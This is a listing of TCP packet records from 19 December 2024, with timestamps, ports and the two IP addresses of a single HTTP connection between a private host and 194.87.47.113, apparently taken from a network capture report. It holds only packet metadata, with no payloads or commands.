Dec 19, 2024 08:47:27.319611073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.319948912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.320246935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.320343971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.320754051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.320883989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.320972919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.321459055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.321672916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.321731091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.322273970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.322421074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.322477102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.323072910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.323333025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.323396921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.324019909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.324103117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.324147940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.324650049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.324841022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.324889898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.325412989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.325654984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.325716972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.326287031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.326502085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.326554060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.327039003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.327192068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.327281952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.327794075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.327990055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.328058958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.328747988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.329008102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.329058886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.329410076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.329690933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.329782963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.330154896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.330404043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.330446959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.330952883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.331166983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.331218958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.331820011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.331995964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.332043886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.332542896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.332758904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.332804918 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.333329916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.333610058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.333658934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.334110975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.334294081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.334350109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.334932089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.335124969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.335215092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.335684061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.335896969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.335978985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.336484909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.336688995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.336783886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.337280035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.337462902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.337539911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.338124037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.338319063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.338382959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.338865995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.339045048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.339163065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.339651108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.339873075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.339931011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.340529919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.340677023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.340722084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.341298103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.341442108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.341542006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.342020988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.342236042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.342344999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.342890978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.343059063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.343156099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.343642950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.343867064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.343914986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.344501019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.344706059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.344866037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.345199108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.345468998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.345515013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.346004009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.346189022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.346245050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.485229969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.485253096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.485351086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.485829115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.486254930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.486345053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.486530066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.486541986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.486634970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.487211943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.500174046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.500248909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.500374079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.500678062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.500730038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.501009941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.501420021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.501486063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.501686096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.502315998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.502363920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.502691984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.503134012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.503247976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.503360987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.503704071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.503757000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.504184961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.504570007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.504640102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.504873991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.505260944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.505384922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.505570889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.505955935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.506014109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.506442070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.506530046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.506599903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.507266045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.507452965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.507499933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.507654905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.508336067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.508407116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.508586884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.509100914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.509185076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.509356976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.509901047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.509948015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.510073900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.510711908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.510864973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.510874987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.511537075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.511668921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.511697054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.512213945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.512301922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.512403011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.513019085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.513067961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.513272047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.513844013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.513940096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.513957024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.514693975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.514884949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.514913082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.515381098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.515450001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.515611887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.516216040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.516298056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.516380072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.517034054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.517133951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.517170906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.517795086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.517864943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.517925978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.518738031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.518790007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.518802881 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.519354105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.519423962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.519792080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.520303965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.520353079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.520370960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.520957947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.521375895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.521394968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.521708965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.521840096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.521929026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.522511005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.522567987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.522653103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.523365974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.523412943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.523454905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.524097919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.524274111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.524333954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.524908066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.524971962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.525041103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.525804043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.525854111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.525859118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.526566982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.526627064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.526654959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.527275085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.527334929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.527647972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.528069973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.528290033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.528311014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.529011965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.529066086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.529247046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.529606104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.529668093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.529900074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.530447006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.530504942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.530698061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.531210899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.531272888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.531361103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.531974077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.532063007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.532147884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.532788038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.532844067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.532985926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.533627033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.533822060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.533842087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.534390926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.534477949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.534569979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.535156965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.535290956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.535341978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.536184072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.536196947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.536360979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.536746025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.536822081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.536921024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.537537098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.537584066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.537810087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.538424969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.538484097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.538505077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.590893984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.678386927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.678689003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.678771019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.678914070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.679266930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.679341078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.679704905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.680008888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.680049896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.680254936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.692765951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.692918062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.692945004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.693250895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.693263054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.693389893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.694020987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.694175959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.694468975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.694876909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.694889069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.695125103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.695295095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.695372105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.695689917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.696515083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.696527958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.696605921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.696939945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.696995020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.697390079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.697402954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.697448969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.698482990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.698952913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.698965073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.699153900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.699368000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.699485064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.699703932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.699716091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.700095892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.700309992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.700469971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.700557947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.700952053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.701406956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.701487064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.701741934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.701951027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.702013969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.702539921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.703054905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.703193903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.703318119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.703600883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.703665018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.704147100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.704775095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.704830885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.704937935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.705341101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.705389977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.705784082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.705852985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.705985069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.706500053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.706856966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.706950903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.707364082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.707937002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.707999945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.708089113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.708410978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.708487034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.708908081 CET	80	49707	194.87.47.113	192.168.2.7
